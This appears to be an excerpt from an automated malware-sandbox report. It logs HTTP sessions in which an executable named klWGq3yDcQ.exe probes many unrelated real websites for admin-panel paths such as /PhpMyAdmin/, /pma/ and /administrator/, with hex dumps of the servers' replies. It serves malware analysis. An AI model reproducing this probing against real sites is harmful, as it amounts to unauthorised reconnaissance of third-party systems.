                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC15911INData Raw: 37 39 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 796e<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC15188INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 69
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> Bi


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    308192.168.2.46347647.246.24.2114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC169OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC734INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 53 50 2e 4e 45 54 5f 53 65 73 73 69 6f 6e 49 64 3d 6e 74 79 69 32 65 74 71 33 65 6a 63 34 30 6f 69 32 69 76 32 65 75 31 61 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 103Connection: closeDate: Sun, 26 Nov 2023 05:59:42 GMTCache-Control: privateSet-Cookie: ASP.NET_SessionId=ntyi2etq3ejc40oi2iv2eu1a; path=/; HttpOnly;
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC103INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 6e 65 74 2f 73 74 61 74 69 63 2d 6a 73 2f 70 61 67 65 34 30 34 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script src='https://nwzimg.wezhan.net/static-js/page404.js'></script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    309192.168.2.463278116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    310192.168.2.46351776.223.105.2304436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC200OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC288INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 34 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 44 50 53 2f 32 2e 30 2e 30 2b 73 68 61 2d 33 32 31 30 62 34 39 0d 0a 58 2d 56 65 72 73 69 6f 6e 3a 20 33 32 31 30 62 34 39 0d 0a 58 2d 53 69 74 65 49 64 3a 20 75 73 2d 65 61 73 74 2d 31 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 70 73 5f 73 69 74 65 5f 69 64 3d 75 73 2d 65 61 73 74 2d 31 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-3210b49X-Version: 3210b49X-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sun, 26 Nov 2023 05
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC964INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    311192.168.2.463533172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC636INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 50 68 70 4d 79 41 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/PhpMyAdminCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC422INData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    312192.168.2.46356223.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC171OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC623INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 62 2d 37 36
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/PhpMyAdmin/Server: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-b-76


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    313192.168.2.46334815.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC194OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://getquipu.com/
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
